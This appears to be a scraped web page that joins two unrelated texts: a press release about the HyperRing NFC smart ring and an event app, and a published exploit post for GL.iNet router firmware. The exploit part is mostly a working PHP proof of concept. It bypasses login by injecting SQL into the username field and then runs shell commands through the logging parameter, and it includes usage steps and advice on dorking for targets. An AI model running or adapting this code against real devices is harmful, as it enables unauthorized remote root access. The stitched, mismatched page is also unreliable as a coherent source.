The HyperRing team developed the Hyper Experiences app in under seven weeks ahead of The College of Extraordinary Experiences event. Delegates were impressed by how smoothly the app integrated with the HyperRing, enhancing networking and reducing friction. In the process, it provided a tangible memory of an unforgettable event that has inspired friendships, projects and collaborative efforts across the globe.

The HyperRing is battery-less and sensor-free and uses MFA to protect against data theft, identity theft, and impersonation. The lightweight specification makes the device effortless to wear, while its sleek, minimal appearance ensures discretion without compromising its high-tech, invaluable functionality. This successful collaboration with The College demonstrated HyperRing’s versatile use cases, from contactless payments to authentication, all made possible by its discreet design and built-in NFC technology. 

****About HyperRing****

HyperRing is a high-end wearable ring that allows users to secure their wealth and participate in the digital economy. Designed as a lifestyle gadget, HyperRing combines sleek aesthetics with practical utility. It provides wearers with a stylish way of securing their assets using the latest cryptographic technology. HyperRing Pay enables brands to increase revenue while giving their customers a practical way to make everyday purchases.

Founded in 2016, The College was born from a desire to change how professional networking and learning take place. It empowers delegates to learn about experience design in a hands-on way. By creating an environment where people from radically different backgrounds truly bond and learn from each other, The College facilitates the creation of deep connections and inspires the technology of tomorrow.

Learn more: https://extraordinary.college/

1.  7 Times Apple Watch Saved Lives
2.  AI-Powered Smart Glasses Give Deaf People Power of Speech
3.  How Woman’s Fitbit Fitness Tracker Helped Solve Murder Case
4.  Shock Clock, a wearable that will shock you to get out of the bed

HyperRing Demonstrates Wearable Smart Device in Joint Venture With The College of Extraordinary Experiences

GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.

=============================================================================================================================================| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.gl-inet.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{ private $targetUri; private $sid; private $glinet; public function __construct($targetUri) { $this->targetUri = $targetUri; $this->glinet = [ 'model' => null, 'firmware' => null, 'arch' => null ]; } private function send_request($method, $uri, $data = null, $headers = []) { $ch = curl_init(); $options = [ CURLOPT_URL => $this->targetUri . $uri, CURLOPT_RETURNTRANSFER => true, CURLOPT_CUSTOMREQUEST => $method ]; if ($data) { $options[CURLOPT_POSTFIELDS] = $data; $headers[] = 'Content-Type: application/json'; } curl_setopt_array($ch, $options); $response = curl_exec($ch); curl_close($ch); return $response ? json_decode($response, true) : null; } public function check_vuln_version() { $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'call', 'params' => ['', 'ui', 'check_initialized', []] ]); $res = $this->send_request('POST', '/rpc', $postData); if ($res && isset($res['result'])) { $this->glinet['model'] = $res['result']['model']; $this->glinet['firmware'] = $res['result']['firmware_version']; } // Check for vulnerable models and firmware switch ($this->glinet['model']) { case 'sft1200': $this->glinet['arch'] = 'mipsle'; return version_compare($this->glinet['firmware'], '4.3.6', '=='); case 'ar750': case 'ar750s': $this->glinet['arch'] = 'mipsbe'; return version_compare($this->glinet['firmware'], '4.3.7', '=='); // Add more cases as per your requirement } return false; } public function auth_bypass() { if (!empty($this->sid)) { return $this->sid; } $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'challenge', 'params' => ['username' => 'root'] ]); $res = $this->send_request('POST', '/rpc', $postData); if ($res && isset($res['result']['nonce'])) { $nonce = $res['result']['nonce']; $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"; $pw = '0'; $hash = md5("$username:$pw:$nonce"); $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'login', 'params' => [ 'username' => $username, 'hash' => $hash ] ]); $res = $this->send_request('POST', '/rpc', $postData); if ($res && isset($res['result']['sid'])) { $this->sid = $res['result']['sid']; return $this->sid; } } return null; } public function execute_command($cmd) { $payload = base64_encode($cmd); $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh"; $postData = json_encode([ 'jsonrpc' => '2.0', 'id' => rand(1000, 9999), 'method' => 'call', 'params' => [ $this->sid, 'logread', 'get_system_log', ['lines' => '', 'module' => "|{$cmd}"] ] ]); return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]); } public function check() { if ($this->check_vuln_version()) { return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}"; } return 'Not Vulnerable'; } public function exploit($command) { $this->sid = $this->auth_bypass(); if ($this->sid) { echo "SID: {$this->sid}\n"; echo "Executing: {$command}\n"; $this->execute_command($command); } else { echo "Authentication bypass failed.\n"; } }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#ssl